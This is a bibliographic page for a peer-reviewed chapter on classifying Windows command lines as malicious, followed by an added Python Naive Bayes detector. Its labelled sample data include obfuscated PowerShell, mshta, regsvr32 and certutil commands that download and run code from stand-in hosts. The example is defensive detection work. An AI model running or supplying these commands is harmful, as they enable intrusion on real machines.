Book chapter, peer reviewed

Detecting Malicious Windows Commands Using Natural Language Processing Techniques

2019; Springer Science+Business Media; Language: English

10.1007/978-3-030-12942-2_13

ISSN

1611-3349

Authors

Muhammad Mudassar Yamin, Basel Katt

Topic(s)

Network Security and Intrusion Detection

Abstract

Windows command-line arguments are used to administer the operating system through a command-line interface (CLI). The CLI gives access to several powerful system administration tools, such as PowerShell and WMIC. Ideally, CLI access is restricted so that malicious users cannot reach it, and command-line inputs are logged for forensic investigation. However, cyber criminals are devising innovative command-line obfuscation techniques to bypass those access restrictions and compromise system security. Traditional pattern matching on obfuscated command-line arguments is not suitable as a detection mechanism because of the large search space that an obfuscated command presents. In this work we used artificial-intelligence-driven natural language processing techniques to classify Windows command lines as malicious or benign. We implemented a Multinomial Naive Bayes algorithm with a neural network and trained it over a data set of malicious command-line arguments. We evaluated the trained classifier in a real environment with both normal and obfuscated malicious command-line arguments and found the technique very effective at classifying malicious command-line arguments with respect to both false positives and performance.
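The abstract names the classifier (Multinomial Naive Bayes) but not the feature representation, and the chapter's own code and data set are not on this page. The following is an added illustration, not the authors' implementation: a from-scratch multinomial Naive Bayes over lower-cased character trigrams, trained on a small constructed set of benign administrative commands and obfuscated malicious ones. The choice of character n-grams rather than whitespace tokens is the editor's assumption about why an NLP approach survives obfuscation: caret insertion (`p^o^w^e^r^s^h^e^l^l`), empty-quote insertion, environment-variable splitting and `-enc` payloads all destroy word tokens but still leave recognisable sub-token patterns. The neural-network component mentioned in the abstract is not reproduced. All commands, hosts (RFC 5737 documentation ranges) and Base64 strings below are constructed sample data.

```python
"""Multinomial Naive Bayes over character trigrams of Windows command lines.

Added example for this page; not the chapter's code, data set or feature
pipeline.  Every command below is constructed sample input.
"""
import math
from collections import Counter, defaultdict

# Constructed benign administrative commands (assumption: representative only).
BENIGN = [
    r"dir C:\Users\alice\Documents\Reports /o:d",
    'ipconfig /all | findstr /i "IPv4 Address"',
    r"net use Z: \\fileserver\share /persistent:yes",
    "powershell Get-Process | Sort-Object CPU -Descending | Select-Object -First 10",
    r"powershell Get-ChildItem -Recurse C:\Projects -Filter *.cs",
    "powershell Get-EventLog -LogName System -Newest 20",
    "powershell Get-Service -Name Spooler | Restart-Service",
    "wmic os get caption, version, osarchitecture",
    r"xcopy C:\src D:\backup /E /H /Y /D",
    'tasklist /svc /fi "STATUS eq running"',
]

# Constructed obfuscated/malicious commands.  Hosts are RFC 5737 documentation
# addresses; the Base64 blobs are UTF-16LE encodings of short strings.
MALICIOUS = [
    "powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    "cmd /c p^o^w^e^r^s^h^e^l^l -w hidden -e aQBlAHgA",                 # caret insertion
    "powershell IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')",
    "cmd /c set a=power&&set b=shell&&call %a%%b% -w hidden -c iex",   # variable splitting
    'wmic process call create "powershell -ep bypass -enc ZQBjAGgAbwA="',
    "regsvr32 /s /n /u /i:http://203.0.113.5/x.sct scrobj.dll",
    "powershell -ep bypass -nop -w hidden -c \"&('po'+'wer'+'shell')\"",  # string concatenation
    'cmd /c po""wershell -w hidden -enc aQBlAHgA',                      # empty-quote insertion
    "mshta http://203.0.113.9/payload.hta",
    r"certutil -urlcache -split -f http://198.51.100.7/drop.exe C:\Users\Public\drop.exe",
]

TRAIN = [(c, "benign") for c in BENIGN] + [(c, "malicious") for c in MALICIOUS]


def char_ngrams(text, n=3):
    """Lower-cased character n-gram counts.  Sub-token features keep carrying
    signal when carets, quotes or concatenation break whitespace tokenisation."""
    text = text.lower()
    if len(text) <= n:
        return Counter([text])
    return Counter(text[i:i + n] for i in range(len(text) - n + 1))


def train(examples, n=3):
    """Fit class priors and per-class n-gram counts; smoothing is applied at scoring time."""
    doc_counts, gram_counts, vocab = Counter(), defaultdict(Counter), set()
    for text, label in examples:
        grams = char_ngrams(text, n)
        doc_counts[label] += 1
        gram_counts[label].update(grams)
        vocab.update(grams)
    total_docs = sum(doc_counts.values())
    return {
        "n": n,
        "vocab_size": len(vocab),
        "log_prior": {c: math.log(k / total_docs) for c, k in doc_counts.items()},
        "gram_counts": dict(gram_counts),
        "gram_totals": {c: sum(cnt.values()) for c, cnt in gram_counts.items()},
    }


def log_scores(model, text):
    """log P(class) + sum over n-grams of count * log P(n-gram | class), add-one smoothed.
    N-grams never seen in training get the same smoothed mass in every class."""
    grams = char_ngrams(text, model["n"])
    scores = {}
    for label, prior in model["log_prior"].items():
        counts = model["gram_counts"][label]
        denom = model["gram_totals"][label] + model["vocab_size"]
        scores[label] = prior + sum(
            k * math.log((counts[gram] + 1) / denom) for gram, k in grams.items())
    return scores


def classify(model, text):
    scores = log_scores(model, text)
    return max(scores, key=lambda c: (scores[c], c))  # deterministic tie-break


def evaluate(model, examples, positive="malicious"):
    """Confusion counts; false positives are the cost an analyst cares about most."""
    tally = {"tp": 0, "fp": 0, "tn": 0, "fn": 0}
    for text, label in examples:
        hit = classify(model, text) == positive
        tally[("tp" if hit else "fn") if label == positive else ("fp" if hit else "tn")] += 1
    return tally


# Constructed held-out commands that differ from every training example.
HOLDOUT = [
    ("powershell -w hidden -enc JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAA=", "malicious"),
    ("cmd /c c^e^r^t^u^t^i^l -urlcache -f http://198.51.100.7/b.exe", "malicious"),
    ("powershell Get-Date", "benign"),
    ("ipconfig /flushdns", "benign"),
]

MODEL = train(TRAIN)

if __name__ == "__main__":
    for text, label in HOLDOUT:
        s = log_scores(MODEL, text)
        print(f"{classify(MODEL, text):9s} truth={label:9s} "
              f"margin={s['malicious'] - s['benign']:+.1f}  {text}")
    print(evaluate(MODEL, HOLDOUT))
```

Two properties worth noticing when running it. `powershell` itself is roughly neutral because both classes use it; what tips the held-out samples are trigrams such as ` -w`, `hid`, `-en` and the caret and URL fragments on one side, and ` ge`, `get`, `et-` on the other. Second, with add-one smoothing the class with the larger training corpus assigns slightly less mass to every unseen trigram, so a long, never-seen Base64 payload leans a little toward the class with less text; that effect is small here but is the kind of bias that a real deployment must check against a large labelled corpus rather than the ten-per-class toy set used in this example.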

Reference(s)